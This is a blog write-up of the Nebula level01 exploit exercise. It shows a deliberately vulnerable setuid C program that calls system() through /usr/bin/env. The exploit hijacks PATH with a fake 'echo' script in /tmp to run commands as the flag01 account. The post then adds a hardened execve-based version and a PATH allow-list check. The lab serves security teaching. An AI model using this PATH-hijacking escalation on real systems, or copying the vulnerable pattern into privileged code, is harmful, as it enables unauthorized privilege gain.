Nebula 01

Exploit Exercises Write-Up

Posted on June 7, 2017 as Exploit Exercises. 1 min read.

Introduction

Let's start another challenge from the Nebula machine and see what our target is this time.

Challenge

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

Code

#define _GNU_SOURCE   /* setresuid/setresgid are GNU extensions on glibc */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  /* The binary is setuid flag01, so the effective ids belong to flag01 */
  gid = getegid();
  uid = geteuid();

  /* Make the real and saved ids match the effective ones (flag01) */
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  /* env resolves "echo" through the caller's $PATH, which the caller controls */
  system("/usr/bin/env echo and now what?");
  return 0;
}

Solution

Firstly, from the code we know that /usr/bin/env executes a program using the current environment. That environment includes the $PATH variable, which lists the directories where programs are looked up, in order. So we can prepend a directory we control to $PATH and put our own echo script there. That script will then run the getflag program, just like in the previous level.

level01@nebula:~$ cd /home/flag01
level01@nebula:/home/flag01$ ls -l
total 8
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01

In addition, the setuid bit is set, so the program runs as its owner, flag01. Let's start by creating a directory under /tmp, which will hold our fake echo.

level01@nebula:/home/flag01$ mkdir /tmp/level01

Now we can put that directory at the front of PATH using the export command, and then create the fake echo program.

level01@nebula:/home/flag01$ export PATH="/tmp/level01:$PATH"
level01@nebula:/home/flag01$ echo "getflag" > /tmp/level01/echo

Don't forget about the execute permissions.

level01@nebula:/home/flag01$ chmod +x /tmp/level01/echo

And we're ready to go and run the vulnerable program.

level01@nebula:/home/flag01$ ./flag01
You have successfully executed getflag on a target account
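For contrast, here is how the flag01 call could have been written so that the PATH trick above does nothing. This is an added example written for this write-up, not code from the Nebula challenge files: the function names run_with_fixed_env, path_is_trusted and hardened_echo, the TRUSTED_DIRS allow-list and the /bin/echo path are all my own choices. The idea is the one the solution relies on, read backwards: system() hands the command to /bin/sh with the caller's environment, so env (and the shell) resolve "echo" through whatever $PATH the caller set; execve() with an absolute path, an explicit argv and a fixed envp never looks at the inherited environment at all. path_is_trusted is a separate check a privileged program can apply before it ever calls system(), and it rejects the poisoned PATH from this level as well as empty components, which the shell treats as the current directory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Directories a privileged helper is willing to trust in PATH.
 * Assumption for this example: anything else (e.g. /tmp/level01) is untrusted. */
static const char *const TRUSTED_DIRS[] = { "/usr/bin", "/bin", "/usr/sbin", "/sbin" };

/* Returns 1 if every component of path_env is one of TRUSTED_DIRS, else 0.
 * Empty components ("a::b", a leading or trailing ':') mean "current directory"
 * to the shell, so they are rejected as well. */
int path_is_trusted(const char *path_env)
{
    if (path_env == NULL) return 0;
    const char *p = path_env;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 0) return 0;
        int ok = 0;
        for (size_t i = 0; i < sizeof TRUSTED_DIRS / sizeof TRUSTED_DIRS[0]; i++) {
            if (strlen(TRUSTED_DIRS[i]) == len && strncmp(p, TRUSTED_DIRS[i], len) == 0) {
                ok = 1;
                break;
            }
        }
        if (!ok) return 0;
        if (end == NULL) return 1;
        p = end + 1;
    }
}

/* Run `path` with `argv` under a fixed, minimal environment via execve(),
 * so the caller's PATH (or any other variable) is never consulted.
 * Returns the child's exit status, 127 if exec failed, or -1 on fork/wait error. */
int run_with_fixed_env(const char *path, char *const argv[])
{
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(path, argv, envp);
        _exit(127);          /* only reached if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Hardened version of the flag01 call: absolute path, explicit argv,
 * no shell and no inherited environment. Returns echo's exit status. */
int hardened_echo(void)
{
    char *const argv[] = { "echo", "and now what?", NULL };
    return run_with_fixed_env("/bin/echo", argv);
}

int main(void)
{
    /* Constructed sample: the PATH the write-up sets up before running ./flag01 */
    const char *poisoned = "/tmp/level01:/usr/local/bin:/usr/bin:/bin";
    printf("poisoned PATH trusted? %d\n", path_is_trusted(poisoned));
    printf("clean PATH trusted?    %d\n", path_is_trusted("/usr/bin:/bin"));
    printf("hardened echo exited with %d\n", hardened_echo());
    return 0;
}
```

Build with `gcc -Wall hardened_echo.c -o hardened_echo` and run it with `PATH=/tmp/level01:$PATH` exported: the fake echo is never found because the child only ever sees the envp array the parent built. The same reasoning is why setuid helpers are normally compiled without system() at all, or call it only after resetting the environment to known values.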

Another challenge completed!

Keep learning and stay safe!

~ W3ndige